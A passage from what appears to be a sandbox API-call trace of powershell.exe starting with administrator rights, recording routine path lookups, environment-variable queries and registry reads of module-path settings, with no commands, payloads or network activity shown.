[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x25e6e0 | out: IsMember=0x25e6e0) returned 1 [0139.296] GetLastError () returned 0x7a [0139.296] CloseHandle (hObject=0x344) returned 1 [0139.296] GetLastError () returned 0x7a [0139.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.296] GetLastError () returned 0x7a [0139.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.296] GetLastError () returned 0x7a [0139.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.296] GetLastError () returned 0x7a [0139.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.296] GetLastError () returned 0x7a [0139.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.327] GetLastError () returned 0x7a [0139.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.327] GetLastError () returned 0x7a [0139.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.327] GetLastError () returned 0x7a [0139.334] GetConsoleTitleW (in: lpConsoleTitle=0x315040, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0139.336] GetLastError () returned 0x7a [0139.355] GetConsoleTitleW (in: lpConsoleTitle=0x315040, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0139.355] GetLastError () returned 0x7a [0139.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.355] GetLastError () returned 0x7a [0139.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e19c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.355] GetLastError () returned 0x7a [0139.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e19c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.355] GetLastError () returned 0x7a [0139.359] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0139.359] GetLastError () returned 0x7a [0139.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.359] GetLastError () returned 0x7a [0139.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.359] GetLastError () returned 0x7a [0139.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.359] GetLastError () returned 0x7a [0139.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.360] GetLastError () returned 0x7a [0139.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e238, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.400] GetLastError () returned 0x7a [0139.454] SetConsoleCtrlHandler (HandlerRoutine=0x29d384a, Add=1) returned 1 [0139.454] GetLastError () returned 0x7a [0139.473] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344 [0139.473] GetLastError () returned 0x0 [0139.474] CoCreateGuid (in: pguid=0x25e718 | out: pguid=0x25e718*(Data1=0xbc90705f, Data2=0xc8ee, Data3=0x448c, Data4=([0]=0xb3, [1]=0xbd, [2]=0xd8, [3]=0xc4, [4]=0x9, [5]=0xd6, [6]=0x9b, [7]=0xbb))) returned 0x0 [0139.504] WinSqmIsOptedIn () returned 0x0 [0139.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.505] GetLastError () returned 0xcb [0139.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.510] GetLastError () returned 0xcb [0139.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.511] GetLastError () returned 0xcb [0139.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.513] GetLastError () returned 0xcb [0139.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.514] GetLastError () returned 0xcb [0139.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.520] GetLastError () returned 0xcb [0139.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.520] GetLastError () returned 0xcb [0139.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.521] GetLastError () returned 0xcb [0139.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.523] GetLastError () returned 0xcb [0139.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.532] GetLastError () returned 0xcb [0139.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.534] GetLastError () returned 0xcb [0139.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.535] GetLastError () returned 0xcb [0139.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0139.978] GetLastError () returned 0xcb [0139.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0139.978] GetLastError () returned 0xcb [0139.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0139.978] GetLastError () returned 0xcb [0139.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0139.978] GetLastError () returned 0xcb [0140.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.033] GetLastError () returned 0x3 [0140.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.033] GetLastError () returned 0x3 [0140.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.034] GetLastError () returned 0x3 [0140.037] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0140.037] GetLastError () returned 0x3 [0140.039] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e48d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0140.039] GetLastError () returned 0x3 [0140.039] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e530 | out: phkResult=0x25e530*=0x354) returned 0x0 [0140.039] RegQueryValueExW (in: hKey=0x354, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e574, lpData=0x0, lpcbData=0x25e570*=0x0 | out: lpType=0x25e574*=0x2, lpData=0x0, lpcbData=0x25e570*=0x6c) returned 0x0 [0140.040] RegQueryValueExW (in: hKey=0x354, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e574, lpData=0x2e48d0, lpcbData=0x25e570*=0x6c | out: lpType=0x25e574*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x25e570*=0x6c) returned 0x0 [0140.041] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2e48d0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0140.041] GetLastError () returned 0x3 [0140.041] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e48d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0140.041] GetLastError () returned 0x3 [0140.041] RegCloseKey (hKey=0x354) returned 0x0 [0140.041] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e48d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0140.041] GetLastError () returned 0x3 [0140.041] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e530 | out: phkResult=0x25e530*=0x354) returned 0x0 [0140.042] RegQueryValueExW (in: hKey=0x354, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e574, lpData=0x0, lpcbData=0x25e570*=0x0 | out: lpType=0x25e574*=0x0, lpData=0x0, lpcbData=0x25e570*=0x0) returned 0x2 [0140.042] RegCloseKey (hKey=0x354) returned 0x0 [0140.100] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2e48d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0140.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0140.101] GetLastError () returned 0x3f0 [0140.102] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0140.102] GetLastError () returned 0x3f0 [0140.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.111] GetLastError () returned 0xcb [0140.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.112] GetLastError () returned 0xcb [0140.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.116] GetLastError () returned 0xcb [0140.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0140.116] GetLastError () returned 0xcb [0140.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e4b0 | out: phkResult=0x25e4b0*=0x35c) returned 0x0 [0140.122] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x25e518, lpData=0x0, 